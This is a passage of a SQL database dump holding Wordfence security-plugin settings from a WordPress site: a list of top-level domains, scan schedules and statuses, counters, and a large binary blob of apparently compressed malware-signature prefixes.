hwarz|science|services|stcgroup|supplies|panasonic|statebank|stockholm|training|tatamotors|photography|vanguard|travelers|vacations|productions|samsung|sandvik|schmidt|shopping|shangrila|temasek|samsclub|theater|saarland|software|theatre|tickets|solutions|ventures|verisign|technology|university|vlaanderen|playstation|progressive|redumbrella|travelersinsurance|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--42c2d9a|xn--45brj9c|xn--55qw42g|xn--6frz82g|xn--80ao21a|xn--imr513n|versicherung|weatherchannel|xn--fct429k|scholarships|wolterskluwer|xn--3e0b707e|xn--fjq720a|xn--45br5cyl|xn--4dbrk0ce|xn--54b7fta0cc|xn--9krt00a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--6qq986b3xl|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--80aqecdr1a|xn--eckvdtc9d|xn--efvy88h|xn--g2xx48c|xn--gk3at1e|xn--h2brj9c|xn--b4w605ferd|xn--cck2b3b|xn--czr694b|xn--d1acj3b|xn--cckwcxetd|xn--clchc0ea0b2g2a9gcd|xn--fiq228c5hs|xn--bck1b9a5dre4c|xn--gecrj9c|xn--fzys8d69uvgm|xn--5su34j936bgsg|xn--hxt814e|sandvikcoromant|xn--gckr3f0f|xn--j6w193g|xn--jvr189m|xn--kprw13d|xn--kpry57d|xn--nyqy26a|xn--rovu88b|xn--mgbai9azgqp6j|xn--mix891f|xn--mgbayh7gpa|xn--mgbbh1a|xn--s9brj9c|xn--ses554g|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbtx2b|xn--rhqv96g|xn--mgbca7dzdo|xn--pgbs0dh|xn--q9jyb4c|xn--mgbcpq6gpa1a|xn--otu796d|xn--mgbah1a3hjkrd|xn--t60b56a|xn--mgb9awbf|xn--mgbab2bd|xn--mgbaam7a8h|xn--vuq861b|xn--mgba7c0bbn0a|xn--w4rs40l|xn--mgba3a4f16a|xn--mgbgu82a|xn--mgba3a3ejt|xn--i1b6b1a6a2e|xn--kcrx77d1x4a|xn--lgbbat1ad8j|xn--mgberp4a5d4ar|xn--xhq521b|xn--zfr164b|xn--mk1bu44c|xn--h2breg3eve|xn--mgbpl2fh|xn--mgbt3dhd|xn--ngbc5azd|xn--ngbe9e0a|xn--h2brj9c8c|xn--nqv7fs00ema|xn--ogbpf8fl|xn--jlq480n2rg|xn--qcka1pmc|xn--mgbx4cd0ab|xn--tiq49xqyj|xn--rvc1e0am3e|xn--ygbi2ammx|xn--mgbi4ecexp|xn--vermgensberatung-pwb|xn--w4r85el8fhu5dnra|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--yfro4i67o|xn--vermgensberater-ctb|', 'yes'),
('tldlistHash', 'ffbb3fad6dd8b97369461b5cce32e30a0760a8bdbc1c26cdf085ef2c3af4eb27', 'yes'),
('noc1ScanSchedule', 'a:2:{i:0;i:1712940000;i:1;i:1713199200;}', 'yes'),
('showWfCentralUI', '1', 'yes'),
('totalScansRun', '374', 'yes'),
('wfKillRequested', '0', 'no'),
('currentCronKey', '', 'yes'),
('scanMonitorLastAttemptMode', 'quick', 'yes'),
('scanMonitorRemainingResumeAttempts', '2', 'yes'),
('scanMonitorLastAttempt', '1712725021', 'yes'),
('scanMonitorLastAttemptWasFork', '', 'yes'),
('scanAjaxTestSuccessful', '1', 'yes'),
('scanMonitorLastSuccess', '1712725023', 'yes'),
('wf_scanRunning', '', 'yes'),
('wf_scanLastStatusTime', '0', 'yes'),
('wfPeakMemory', '77070336', 'no'),
('wfScanStartVersion', '6.5.2', 'yes'),
('lowResourceScanWaitStep', '', 'yes'),
('wfStatusStartMsgs', 'a:2:{i:0;s:0:"";i:1;s:0:"";}', 'yes'),
('wf_summaryItems', 'a:8:{s:12:"scannedPosts";i:0;s:15:"scannedComments";i:0;s:12:"scannedFiles";i:0;s:14:"scannedPlugins";i:0;s:13:"scannedThemes";i:0;s:12:"scannedUsers";i:0;s:11:"scannedURLs";i:0;s:10:"lastUpdate";i:1712725023;}', 'yes'),
('scanStageStatuses', 'a:11:{s:13:"spamvertising";a:4:{s:6:"status";s:7:"premium";s:7:"started";i:0;s:8:"finished";i:0;s:8:"expected";i:0;}s:4:"spam";a:4:{s:6:"status";s:7:"premium";s:7:"started";i:0;s:8:"finished";i:0;s:8:"expected";i:0;}s:9:"blacklist";a:4:{s:6:"status";s:7:"premium";s:7:"started";i:0;s:8:"finished";i:0;s:8:"expected";i:0;}s:6:"server";a:4:{s:6:"status";s:16:"complete-success";s:7:"started";i:5;s:8:"finished";i:5;s:8:"expected";i:5;}s:7:"changes";a:4:{s:6:"status";s:16:"complete-success";s:7:"started";i:2;s:8:"finished";i:2;s:8:"expected";i:2;}s:6:"public";a:4:{s:6:"status";s:16:"complete-success";s:7:"started";i:2;s:8:"finished";i:2;s:8:"expected";i:2;}s:7:"malware";a:4:{s:6:"status";s:16:"complete-success";s:7:"started";i:2;s:8:"finished";i:2;s:8:"expected";i:2;}s:7:"content";a:4:{s:6:"status";s:16:"complete-success";s:7:"started";i:3;s:8:"finished";i:3;s:8:"expected";i:3;}s:8:"password";a:4:{s:6:"status";s:16:"complete-success";s:7:"started";i:1;s:8:"finished";i:1;s:8:"expected";i:1;}s:13:"vulnerability";a:4:{s:6:"status";s:16:"complete-success";s:7:"started";i:1;s:8:"finished";i:1;s:8:"expected";i:1;}s:7:"options";a:4:{s:6:"status";s:16:"complete-success";s:7:"started";i:2;s:8:"finished";i:2;s:8:"expected";i:2;}}', 'no'),
('lastScanCompleted', 'ok', 'yes'),
('lastScanFailureType', '', 'yes'),
('scanTime', '1712725023.642', 'yes'),
('autoUpdateChoice', '1', 'yes'),
('lastEmailHash', '1712002164:24fc5a57ae340e76bcc6d40fa91ed38c', 'yes'),
('lastAttackDataSendTime', '1712762276.968555', 'yes'),
('lastAttackDataSendId', '52065', 'yes'),
('originalScheduledScanStart', '1712680800', 'yes'),
('lastScheduledScanStart', '1712681571', 'yes'),
('malwarePrefixes', '‹\0\0\0\0\0\0Öy8ï\0ðÙ—»Î;Ë½sIYJ…ŠBR$RI%QŠDÙZHJ!I+…J”¤H‘Š”´i!*)¥EE+Ò&~ßßŸçœyžyßç3çÌ3>ãÇŒ\no>^×ß''Ì_wBØx³1ãuO¿\ZÞÿ Õ%ïe\rÉ?ðECËÄ)¥³ŽM¾>í²Í8)ûÿ}–ãu×„ú-XïöÿË1ff–æÿm\0–é\0øý\0Ýràa?\0xG7\0?Û )ûô`‘\0ö4ÀÖDÂK@ÜbH½\0Y®+ gZ\0¹p\ZÏê¨›‹\0êß@1¶Pt„ô¡€180å\0ûv6ÀÙÈ. à);€÷¾ð§´Õ¼\Z@U—	¨Ó{\0uŽ ¾''ÔÏîÂÌ@p_ö€F»Ð\\q4·Æ\0Z.=€ÖÂ_€ö\r0h²êíèŒït&Õ:A‹€!·í\0]ýß€î¤\n@7è\0 ûb? gè]¬–ÙÛ;€aÜl`Ø,[À0ì`¸í`xý,0ü`00¼¯aŒ˜ñì$`d½0Z§U\\\0Œ>ÍŒK>Æï&¶)€Éæ/À¨S5Àè½)€;0ó­€r°Ø=	›»7ë?î±À¸ë­À¸º`\\C`9Þ°*XXÕ€Õïd`üÉ~`‚6LˆXKþÖ—_ÖW–6$`Û÷°»¸˜t¦˜t/˜<$p8·7ŽOÓ\0§ü`šm0mà‚.V!ÀôÝý€kH,à\Zý˜ÞÌHðfœ~Ìx8˜9½˜•ü˜uúà6~à–…³Žî«\\÷Ÿ¹À\\§`îÃwÀ<Ç:`^s0Ÿ³\0,?\0,H{\r,8ã,(N\0\\Y\0,øžx,þxä¦\0žcO«Ó€gö#`¡½-°Ðuà¥­xx›s€·/à]˜\0,¹%|ˆë€ãøl¼øª0À÷,õÔ–Y·ËÖþg×8`Ù×À²Ñ€Ÿìàçžø]ôüêCå''v\0þkÜ€\0É& `O,:	X©˜&"@`çH hú4 8ZÇÁÜÕàs`õÞIÀ\Z0XÓºÙ›„A@XPv¹/6"°J bé\Z "k\0X§¯Öõ:ëýï\0¶†‘—Q òU5d•DG]\06=]ln¶X†[VÁ@¬.ÄE±ÿ½»Ø$ˆ½·Øúó°õ.°-©Ø¶ï,°íù; ~Îj >éŸNñuç„µù@BŽ#8ºHÜ7H|;Ø.v„¬’œ+€$— i‡?°sä ¹+\nØõÊ	Ø,v4{—Àf7°gëo`ï§ûÀ>Ùw`ßÈ^`_ïN`­R<æ)AÔ=ÉÀqÀ—R M÷6f0\nH—/\02ÆK€g; Ãc"9P²0%k€ÃÓ¢€ìá™@¶ßD gß= çž3pdQ!p´ý4p¬YäÖÜòÀí@Þzs ï£×çœpÍN\Zþ\nŒó‚t_àT£pª[B±@¡ñI pþm ðá\Z °=(ìžœn»œ1\ZœY\Z{¬Š—{%''Fç|¦\0ç*^¥&Àù™•À…)ÚÀ…í‰@™ü(›2(OR£³€Ë§ª€Ëw&WÞæ\0•“` Òm=P¹2¨Õ@õôk@õF :ñP}®Õ|®×Ù7:†µ†£€ÚS÷€ÚÛç€[9ZÀ]¸r¨Ó™\0Ô5G÷f6\0÷|åÀ}E$pßð@¿xxx8û2ððÄ/ Á4h¸txtöÐ8S4¡Ï€ÇcÃ€ÇQÀãGîÀŸ§À³Í^@ËÅ6àyì à<xaj¼Øû\rxi9x9Y	¼Ü^¼¬^KÚ–ºmébàµ·=ð:$x1x;rðö²)Ð®c´¯\r¼ŸÐ	|hK:ÌO|€Ï»u/¶³€o‹¢ïç§]ËöÝÀ# [Ïý?ñ@÷Â@ ûˆÐã=í\r¿_…ðÇ¾ø›Uüý¶è»÷ø7c"ðoN)0 ‚K€àµK 4M„ò?€Ð§û |„c¼@ÄºDöº‚h¼-ˆ/1''ÄþÎq¬Ä†xÔx6$/ÍEÖ. Èë8(Z;]ŠË¢@ñ”@k@Éð$P2Ù”†ß¥[ß€2»hPöu:H¥DƒTû3¦Ë@f¿''È{²Íù G¤‚ÜºP¥‰\0UûAUR\0¨ÖêÕŸ€ê‹é úÞ~P-…E© °n8¨™Ujé¥ZÃƒZó|A­ÆM ¶~!¨íUj?ùj?{*›\rêèåƒ:›²Aš-ààÀvpp¼)8D³¢WêZ;º¯úÛÓ@WÐÀóhðò84-zq	8lé0Ðp®4ÌN\r_[€ÃÙ\ràp?8¼X’Ž¸œ\Z}M\0]AãÙ;Aãñ 	”šÈÚ@“8ªÑõë.8\Z\\šŽ}šZÍÂï€æà Ð¼·ë³{*gp·b8®í\0h9v>h¹ûh™5´šø´JN\0Ççéƒ‚û@k™h½þ\rh}À´þ¹´ÙÚìlmN^mÊAÛoEàÄ/ã@;ç~ÐîU8iÑ?Ð>&œÌ/''?O\0§|D@§@''pZÙÐÙz!è<ù8=‡]#~€3g‚3¦G‚35\ràÌ+GÀYn€nÁÙ÷€î_A÷œ±àð!8®çºXƒóôÓÁyEÁùêÁùéÀùÿüÁÎà‚È\rà‚$%è!o=†ï=êŸ€­– g…¸pÏ\0¸ðœ/¸°y¸híApQå\ZÐK²ôš´ô:R.¶ß.¾üôn‰—äçƒ¾‚K=ÓÀ¥G·‚KóTà²kÐþúeW¸d‚+ÞOW|ëý7]W>ØžÆÁÀG0Ø¢®²4W]\0WÝX	­…å‚Á{0øµ’?^†½X†uÇ€á#ß‚ƒÌÁˆŸ¶àÚõ!àÚM¯Àu+>ëªöƒëošƒQ>Á¨3öàFø4¸±Ë\0Œ^5	Œ>”	F>nú¡Æ\\]Æ< ÁÍ\r\npóÓLpó«à–+àVf=¸uº7¸mú2p[êWpÛ‰}à¶''0nb·ÙŒ·Œ\0ã÷€ñIÕ`Â’,p;¿Ll§Á6¡àŽGÁ¤X)˜ÔÜ&¯œ\n&§?w}H÷ø·‚{{æ‚û´‡ƒûæ=\0÷ß¯÷*S—x€©-ŸÀeàû`Ú‘+`Úýr0í©\r˜>hxpõD0ã[=˜éè*pç‡·^\0³RÀlU˜Ýž\0æ„\0sþŒ1›Ác/÷¹“U`î"3ð8_R\nÿøÌ›˜\0æ5žóþöù÷ËÀüëÁ12° y6Xú,ø»<µxêÃ9°Ðì*XX÷,ò™½`Á3%OÀ³²MàY+sð¬¿<»&<ûÛ\r,60K˜@°´0<ï·¼0lXÆõƒe¹3À‹J°B¶¬0«+æ.+Âgƒ—–„€—)7ð²gxyÕEðŠñ\\ðŠ×H°«+·«FE‚W¿Œ«Ço¯¹?¯E<¯Ï×kòCÁšÿ9u¼ý¬5¾Þô¼½,¼ªÞ®©o÷‚wuç‚w‡^ëÆ¸‚ììÀ‹–‚''‚‘àÃÿêÐ ï	>\nj¶\0}qw§ƒ=‘`S½=ø-ë{(À''oÁæià³$l‘õƒ-#g€Ï×/Ê°µž_š$ƒ//Ô‚¯ü+ÀWç?€¯žãàu\0øœ	¾s°ßµ•ïz§ƒïùµà{›^ðCÒðct<Ø1<\0ìv”¹çmÀONÖà§ÙÙà§sÎà§Û§ÀO/ëÁÏ ø¹¦üò~øU´ü>}8ø½X	vÅ]»:°ÛX\nvï{öDÝ{ËN?ã1ðçïbð—×oð×2_ðWÀvðW¶ø«u6øûÂ\Zðï#ðïÃà?Ãõà¿²0°Ÿêûk;ÀW; À“†€47CàÝìp† #ºÁ\n{ž0\0Áv¶|ç„!Äb9„.y¡ l×¯ºæ1€ˆm#!rû''ˆ¼\Z\n‘!Ñ¼XH²%’:+!é©«ôÆ[HfÉ¾\\€äSÅü•-D\ri…¨ã''!…»¤hÙ)1Rj/€”w, Î¬â“Û!õ?H0ý	VG!a»$ìð…49¯ ­wAö4_HG{¤óO\rÖÞ\röt‡‡<…ß{\rù÷ÒËŸé}Üé»‡ôW¼‡ôwo„ô¿˜@CÇÖAÃÜžAÃ|AÃJ¡a—» Ã‚+Ðˆ–5ÐÈYrhäÝ#Ñä\ZÈèŸ\n2î%!€Fi-†F‚F''¾ƒLß4Bcd%Ð˜+ 3ŸdÈœ" ±ê]ÐØ-éÐ8ã$È²p*dYÆBV¾@ã''éC,t Û$dmÙMXÙ— ûÃk ûìóÐ»EÃrHQBŽsS ©iÙÓhÚª«³û7È¹ð;äà¹lš\0¹¼\0M''CÓùhúÅ.ÈÕ³r]=rÝúr}òš5*š=ú$4Oè†æ_<	-øï<ÚC $äIxAžs]¡…Â4há„ÐBo3há=Z4|=´è±+´èÏSÈ«v''äí”y§ZCK<ÇAK²ã %Õ«!Ÿ!ë ëxÈ×}ò¼¡¥\Z ¿›ß ¿7w å‡â åOfB+Ö\r@+chåž…ÐÊ»Ã¡•o@+{CöéP`Å;h;Z5ÍZÕ¤‚Ý à"h5­v7…V—‡B«/–Ckà¹Ð\Z×PHÖ(t:…Þ_…ø…d (Âé!±÷;´~ÔhýR	ù,Š	5…brnA›‡VB›+>A[ìïC[w|…â,= I$”03JØ9\0%ü˜\nm·j†«•ÐŽ˜(É´Jšì%mý/¯%½ú\n%_‡vM¹\níºòÚíqÛí¹´ÚóÇÚOA)g_@)/Ú Tq%tÀâ”V˜¥O|\0LºÌ	Ì\ne¸ÅA™fYPæ„(óñèð9Oèpçy(kH”kåøèCG8tditäØèÈ“è(g³»{ûk	_Ò\r?~ÊûøÊ·Ì€ò#G@ùCùwÖC''à_Ð	‹ŸÐ	—YÐ‰´[ÐÉ¯¡¨*ØZj}	êB…ÏCEˆTä9*Ú>*ú	Ag\n~CÅŠ÷Pq¨*Þ?*)Ì‚JN†Î¹* swæC¥cÊ ó›pè|ž7tþÔTè‚è2T€AW™A3äÐ%/	tÜ	UM_U½q®n]]M•BÕG k	‡¡k§¿C5žÐ\rãïP­Gts÷cè–ÁLè¶XÝí9\0ÕiŒ :Ó èÞ:º×®Ý°€Ð º¿ zÎªj=ª›5nó†·''BOý@Í÷ë çË@èå¿uPwj3¢ ¶%YÐkê\rôzÊèMÆzèmrÔ¾9zÿÇúqúðÒúðeÔ‘iuš\nuzý€:ãÊ O×Z Ï~MÐ—šãÐ×øoÐ·ýFÐ÷ÔN¨ërÔí	uÇüƒº“µ î{_¡ks¡Þ3zPoUôsÕmègýaWA<R >í{Ð¿žl¨¿FêïÃa4…Á©q0”z†mü`¸¦FôžÁˆÑuËw‚±ë‡`Ü&Æ/Ã„ùr˜ÝÊÿÜ‚I`L¦–Á¢‘‰°(»	µ³°¸[KM†%''ÁÒKÉ°ô±,\nËö¼…eµ?a:*¦_„•F7`e”VÂÊ×&0C‰`N‘s‰‡`ÕâË°ê×qXX’ÅÎ°ðt5,4Á\ZûdX³Ck¯ºš:"‚u|&Á:mÇáÁ›Pxð²}>¬»î!¬—Ðë]Üë›{ÂCÅðÐÊýð0ä<¬Ý6t>ï<\04˜\0™Ý9\r½`£Ol\\k	›|÷ƒMþYÁ¦^ž°¹$6wþ›Ÿh…-ú¶ÀV6k`«¤Eðø¸x|É=ØºðlSÛ4¿„mþ6Â¶_ÂíRà‰¥ðÄ—ØnÓ>Ø~°!<9¼vˆ};\\4…\rÀS¯o…§™iÁÓª_ÂÓžR°³Î(ØyÂ\rØ¹èìB?†]£ð*žÑqž	ü‚gN¼\rÏô0ƒgfngÅÀnR`·‚ðìëbØýÌxN°<×PÏó=Ïwœ/Ø¬‚=`]x¡Õxáö>xÑ¹¡°WÉ?x±Ë}xñ[öÖ.ƒ—|t‡}F$Áÿ•öqx\rûô0°ïùPxéíÝðÒCáešxxYåjxYÕ+ØOoìU	ûåÀËï\r‚ýKõaÿ–°ÿg\r¼ÒÐ\0^Ypë	Ú˜ÃkÿÁ«\ZÊà`>Þ¸^=ê¼æE²çòÌµ}AÃaåŽpØ[çÂómáˆ³YðºîÇð†’»p¤±y1	Ž¬©†#ûoÃQ3]á¨Â8êt¼1ù¼1¥ÞøÀÞøñ¼Éló!Žù˜Ç‚×àØÝ¼õÌ;x[Ä(xÛ6Žsy\0ÇøÇW-€ã__ã;†ÃÛhxÇ‘›pÒ´hx''ðÞ>ÞåvÞ#ÚïyõÞ;é8¼÷ãx_ï{TïIÀû§‡Sà¶qðkà¹Cà7‹á4[N[ë§_n€Óo”ÀéÍ[àƒß\ràs78c¥6œÑågš	gf¬³K:áœÛá#áMð‘£>ðQ¦>zÅ>f³>îLÁyGà¼ëpÞ£ùpþ ×ð	"\n>‘p>Ñ÷>©ß	ŸôŸ¼íŒ,‚Ž;Â§NØÁ…]YðéE›á"ãHøÌ°£ðÙšøìmK¸¸..Yu.ù9>·r|þÙ<ø¿.cÏÃSþÀ‘\rpÅí…ð•!p•m\\uæ!|õô1øZâ%¸&g.|£º\r®¥ÂµñýpíþvøæüÅð-#ø62¾ckßqkƒëìžÃuŒàº.søžØ¾We?ôq†<‚–Œ†ëm@¸>ÚnØ7ÄoîäÃâVÃM£ZàÇ§ÖÀOf™ÀÍ»õàæ¿ág5üÜwü¼Ö~Q9n=LÀ/=àW+õáWý?á¶UŽðëHøÝØð»¸^ø]ö-øÝß«w¿Ã‰6øãXøãÒF¸óª;Üù~)ü©oü5x*üõÍoøÛMgø»w±r¸ËÃ\rîÚow½Ûw?6…{\Z÷Á=ísá1ËáÃ½:‘ðÏË«à_Ã#à_»''Á¿Ìá?^•ðŸKøï¼#ð_ïÍpæ¸?[<Ý\0´†>Ø"@ÌnÈ>ÀÔ7©‹ So#hÊ}=Á¦®D°åí^q!ÝD<9\0ßND$·!’æ/ˆ´R‘¹9!²ã·ªæ&¢¨MD·Úu$Bïÿ…ÐOî#Jî¢œýa‘L„}ØŠpÖÁošŽðG_ ªsWÕõND±QçGÅDxv\nÑ²ûŽhE× ZÿmÍLD»¨Ñn_‡h\rD‰® ƒ®ŽGt¾ýCt~5"ƒ§¢ÈàÅˆÞoDïãDßà¢ÿG1ð{ˆ´NF†>ª@†!©ˆ!º1…ÿšŒ\\w1\nŽ@ŒÖš"F}çãvˆñÆÈèŸ¦ˆ©}bÚ¸³â''2fà>bVe‚˜K& æ^oÅ]Ä"u''2Ž¼ŒŒ[jŠŒ‹š‚Œ»X*G#–­g+ub†Øè©ÄÆß	±%Ò‰u}ˆÝ\\dÒÚaÈ¤c+{{	2e¡âàðq˜{q(õFë†!N:ƒi›aÄyCâ¼c*â|<q>¿q¾rq9}™î<™^õ™þù	2£¡™ÕŠÌü¹™%Yª¹ˆ[¨7âþ1™3ú\Z2ÇÅ™»j"2÷B\Z2÷½)2··™§úÌ3²Dæï¹‡Ì¯Z†,È„x„ø!a%ˆgäÄsƒx›‰,Ü¾YÛ!^•Ûo¬ñÍ@¼×#KjZßÜ	ÈR}CdéüUÈÒØCˆßÚ2Äïh$â—gŽøõ¾A–¿ +NÞBüUYH€*YÙ½	\\ð	ÌƒžòFëmUž?UÙ4þ(Ð†ÇE‚OÿBV§îEV7CÖLÄ‘5Gí	)X‚„N[„Ö¤#áKA$âúZd­n²nîsd½"Y‹¬¿T€l\0­‘hó$:à]q‰qöG6óáÈ–)…È¶ÅÃ‘m)ó‘x×j$¿ƒ$,Z‹$¬þ‹$$E¶—íÍw7J‘$Õ,$é’\r²s¬Ù¹ñ’|ñ’ÜÃ"{œ¿!{Âu½“W {ž#{?mFö]@öSÏý¿> ûÿ™ )‹Æ")¾’«¤\ZERçÎCRï7""Î Þ#i[Æ uäàä$$sÛxäÐ¸ñÈa«.äpb3’uŸE²¿: Ù½™È{äèÞ»ÈÑ‘£ÕÈ±²³Hî6=äøÉã†!yb‘“J9y¡9Ym‡ ÈiÑE¤hrrÆá\0r&Õ\n9Sø9kô9;ë3rö„R<Í)ÑíEJš,s}<R:ë7Rê>¹P›‹”Í¡‘²¢gHÙýD¤¬¡¹8®¹¸érIã„\\?\Z¹<B.§!W^k#•§® •wâ*Ã&¤*°¹:aR½%¹NmDj†¯Gjân#7:JZ­õHíËHíoä¦¤¹ÙŽ ·¥!ÈÝÔQH]¹1r/[¹÷{''r¿-©Ÿ•Š4Øö#ŽU"Í5H“í¤)ŸG{ÀÈ“Ù7‘§{¥ÈÓÞ…Hó›õÈ³,K¤eÈ$¤Åù1òÂ¿yy«yEø!mâ™H›ñ8¤íÎ\Z¤­eò&Nykóy»ÖywÀy×ê´K;öâýH{m?ò8…¼C‘÷çò\\òñ¿úv¤=D:_”"ŸV|C>½³@>ƒ8òÒB¾,[†|)´B¾œ­@¾”.B¾Íþ†|ûÑŒôÿF~ÌüŽühÔ ½óÞ€R¤7Íé-›ü4{…ü>zù}¦ù£Uüñ¬@þ&; }K¤Hß3äöé²	é_péo»ŠÀ¿™(øü''\nu¥£°:	Eîú èÊ›(\ZøEkÕ(®tBqÃû(Y‚Š†¯EÅ¢¨Ø´•¼?‰Ê®ODåª¨ªB•3ÚPF/e>c(Û‡r#¼P÷pTsÂd5Ü¨A‡<~‹êŠÊPÝq*T÷‘/ªÛ2Õãß zëP½œRT¯ñ7ª?•FõåèÐìÙ¨¡Aj-B‡ûCGOGÏ¨IúqÔäª:æõlÔLP¢f»ÚQ³C‹PB-¶÷¢]jñã5:¶í":ÎÁ7ó"jù\Z@­\\ï¡Va7Ðñ{eè„•¹¨5¢ÖÏö¡¶cÝQÛ}cÑ‰ÂÔ>ˆNÞ²Ç¡ïuPÇ™CQÇë:èTÍgÔiÕxtšÌ¶=u)ŒB]Î¶ Ó±2tºz=êúx:CtÉ–¢n¥ž¨[e;:›˜€Îžzu{	S¨Î[ŠÎëšŒÎ|Ž.0¹‹z² ê¥{õzTŽ.Þ=\rõÑ’£>½E¨oéÔ÷6ºÔÅõ[rõk‹DW4ŒEý³¾¡þö¡þÍÛÐ•ƒþ¡+=î +ƒ`te¯>ºŠÚ„®JnDƒôÑÕ£o «/;¢!c×¡¡Þ›Ñ°''4|G,\Zžû]kþ]?è-º!xºá¤\ZI8£‡÷ ''ïE7èÆ\Zi.B7»¼E7ç£èæ/1hlc9º5e\Zç*G_¡	±SÐí_ÐÄ/¾èŽ[SÑá5hòLc4ù†šÜ%CwÅÐènE\rºÛ>Ý}åº7nºo·ºÿ‹5š¢wM1´@SÎmBS®X ¦ÝBS£®ÜGÓœÑ´}Uhº‘z0V„fì|†fêÝ@3ÿÕ¢‡l|ÑÃ#ÃÐÃ\nÑ¬1uhÖ­ÓhVó4g„æŒM@sâ"ÐœìX4çe(šóa$zôd4š»­Í-ÑEžˆæ­(Fó²–¡ù3tÑ|ÿ¿h~ô4¿Í=qFOôíCOæm@X-ÐŽEÆ¬CNÌFO­¯BO{FO¿?ŠÇ$£%þè½½è…ÄZôBû0´L÷\rZæt-›u-+üˆ–×ë£·­G/÷e¡W¾¤ •Ÿ\\ÑÊÞ·èUýèUýèÕaNh5´­ÖrF«+£ÕkÐk%Íèµ{‹Ðk_Õèõ·ÕèõžXô†üzãbZkí€Ö®qBoRèÍË^èÍêzôvä(ôÎš«è½­è½}­è}Wz?&\0}([†>\\‹>’h£IÚØaˆ6þ‰G›¸õh“mÚT€>‰ÉGŸÂuèS¡è3}Vbƒ¶ì”¢-® Ïw½GŸŸ9‚¶®z…¾ôýOr"ú²5}5¶}eÝ‡¾Zÿ}Õþ}=¾	}=ëúúQ(ÚnrmŸô\Zmcƒ¾OtEßßÈD?ŒÉG;lÐG/´có´ã,‰vú}B?Ÿßƒ~þ<ý\Z‡~i°F¿jMF¿ê_D¿ÍF¿›F»˜\rh—æÚu§íºûíúÈ£Ý£œÐîCÐîs«Ñžâô‡Ã/´×¥ý¥Fÿt¼Bû‚æ¢ÿÖßCû!S´TÚoÖöGÍ@û3¦£ýùè\0RŠ­O0¤\ZÅÐá–cX{†ý‹Àðò_~?\r#Ê]0âæ;Œ¬vÄDðyLlž„‰}Â0ñ²lLb`‡IâÎb²•w1Ù†û˜ì€QÌyŒqS\Z¯Ä¸32Œ/?©jžbªßN˜zô-L}ÄS·…aš®S˜æO¦5ì¦­ç‚içbÚU‹0íë	˜ÎSslˆn¦{ Óƒ0½Õ?1½¼W˜Þ×I˜ÁÁHÌàÈSlhB"6,~\r6ì[fZŒ\r÷/À†_˜‹°*ÆFûƒü[Oæ°Ñ5¡Øè/©˜©Ö Ì´&c²³/k¾{à663\Z[þgò×TYÀ,Ãõ1ËÚl¼ÉLl|­-6a¤	f3î/f3ëfË¿Âlí1Û¨ÿòôåØÄá¾Ø$ö6©ô6i ³×Y‰MY€M)ù9™aŽmŽØÔa7°©¡C°iŒ6í†;æ’2sùHa®?‚±ªÁØŒ#§±Y5 æ&ÁÜ¨cØì¸nÌsÁæôgbså+±¹†ýØÜßžØ¼Ò7Ø¼o?°ù6ÿq)¶\0¾…-h×Å<Æ÷asÛ1ÏÅ=˜çÞ˜gÁRÌó¹æùÖ[¸S…y±±Åƒa‹—žÁ¼Ó°%?ß`>ŽK°eƒÞaË&]Àü—b+z³°€!ñÈû‹­tÞ­|5|q|{[5e4ò”ý:„Ë\\±àg$Bta!Þ±ò×X¨‡…¾LÀÂªî`ágŒ°ˆá³±ûuØº‡±uñØ†Ç½Ø†g±\r_œ±È]ÆXôˆÃXôÉõXtq>¶‰Ü„mª…m€mN8m>tÛüÁÛ²Û‹=šŽÅþõÇ¶fÍÇâôZ°¸I\rX¼xÿp=–ýK¨þŒm—çaÛUúØö*¶½é–x;Kìý€%Ý·Ãv¦ŸÅ’ÃYlš‹í”b»£plÏ”5Øž§ÅØ¾Ÿ°ÔIk±ÔLK=iƒ¥ö.À''`éÃÃ°ôØÑXúÍìàï4,3x\rvh÷ì°îì°?–eúËºn‹eêbÙi4–cÜƒ¹ñ;ÊNÁŽ-ËÂŽ½:„å¦c¹—œ±<t–''Žå©¶byw\r°|h!vâ»;	þÀNîŠ„?Â\nDc§-ÀŠtß`E®qXÑu.ê&±3ºéØ™àuØÙå,V¬JÇŠ›°â-!XÉ¡©XIÏeì\\ÿF¬tü9¬ÔÚ+®ÂJÝi¬´ê¿¼%»ðDŒ•uÂÊ!%VþÛ»ˆÁ*nÃ*úý°KZýØ¥o[±ËzºØ•/XeÔn¬ê;…]µf°«?n`ÕmO°k''7b×\rc×—ºb×o.Á®·\rÅjb°š={±š¼Ø\r·UØ\r¯cØ;ØæùX-7\r«}ÿ»™»µÍ	»]=»Û…Õ!û°:ËZìÞòØý%ØÃÑµXÃÐ9Xƒ%„5B_±''…]Xs”%öltö,<k¹V…µü2ÇZù•X«3†µú™b­»¦c/Wb//Ea¯ß-ÇÞ0[±·7±w§°÷Ègì}oÖÁÂ>¹ìÄ¾*ÅØ÷¡õX×ôj¬+{2Ö]õ¸,Â~G±ëÒ°QYØ/,ûµ\\‚ýŠøývZ‡ý±à±?N…ØßÕ#±¿ïH¬oÏB¬¯½û÷æ,ÖßÜ‡;q ª‡Žþ§Ð\0G<Üq\\¿''M''ã¢÷qñ	\\rk.å÷àÒŸSqÊö®hjÂY­hœÝÓŠs•›quÐF\\(Ý‚kt×á\Zc®mŠkß¶Á5â:¶à:óýp\rJ|°›>d´5>dÅ[\\·R…ëöøázÛ¾áz{špý­6¸~å]ÜàòiÜàÉB|˜ô>ÌÊV­ÂGtÅå¸q~nüõnrt=>*å<>êD%>úîMÜôòOÜt`â]„é8Œ›Õ¼ÆÍ‡|ÀÍmÜÜã,nÞmˆ[ õøØ„p|lê;|z\n·<®À­ŽOÅ­n˜ããu‡àã—=ÀÇw8áv¯Â''TŸÇmlnã6¶z¸ÍÎ[¸M-nó­	·à]7ãvƒzp»wñÉý¶ø”`k|JúOÜÁ?w[‰;MÁ½áŽ;MqÇ#\røÔ˜d|jZîÔÝ…O³º;ÿÆ]¸¸KŸ>Ý0ŸnºŸ™îƒÏÌ0Åg®Ãg¡Eø¬\0O|Vw%>;ø\Z>û¨7în·Ÿ·ì,>ÿ¢5¾À>_°e/îñéîy¶÷¬[Š/´Ø/|¶\n_äq÷zŠ{uà^\ZÜÛ0